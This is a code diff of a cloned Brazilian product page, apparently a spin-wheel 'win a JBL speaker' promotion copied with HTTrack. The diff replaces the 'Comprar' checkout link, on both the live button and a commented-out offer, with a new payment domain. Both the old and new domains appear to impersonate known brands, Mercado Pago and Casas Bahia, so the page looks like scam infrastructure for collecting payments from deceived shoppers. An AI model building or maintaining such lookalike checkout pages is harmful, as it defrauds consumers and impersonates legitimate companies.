--- a/roleta/jbl/index.html
+++ b/roleta/jbl/index.html
@@ -1,5 +1,5 @@
 <!DOCTYPE html><html lang="pt-br"><head>
-   
+
   <meta charset="UTF-8">
 
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
@@ -104,11 +104,11 @@
             <span class="free-shipping2" style="font-family: 'GellixMedium';">Frete<span class="material-symbols-outlined" style="margin-right: 3px; color: #4caf50;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
          </div>
       </div>
-      <button class="pergunta-botao" href="#" onclick="window.open('https://pay.seguro-mercadopagamentos.online/6YQPgj98QoeGpxz' + window.location.search, '_self')">Comprar</button>
+      <button class="pergunta-botao" href="#" onclick="window.open('https://pay.comprecasabahias.shop/xQBPZvOaq8yGmVq' + window.location.search, '_self')">Comprar</button>
       <!--
       <div class="promocao">
          <p class="promotitle">Ofertas especiais 🔥</p>
-         <div class="button-container" href="#" onclick="window.open('https://pay.seguro-mercadopagamentos.online/6YQPgj98QoeGpxz' + window.location.search, '_self')">
+         <div class="button-container" href="#" onclick="window.open('https://pay.comprecasabahias.shop/xQBPZvOaq8yGmVq' + window.location.search, '_self')">
             <button class="styled-button" style="background-color: #ffffff;">
             <span class="button-text">
             <span class="button-title" style="color: #0169EB">LEVAR 3 UNIDADES</span>
@@ -208,7 +208,7 @@
          });
          document.getElementById("tv").addEventListener("click", timeTv);
       </script>
-   
+
 
 
 </body><!-- Mirrored from promocaorespondaeganhe.shop/produtos/caixa-de-som-1 by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 14 Jul 2024 17:40:03 GMT --></html>
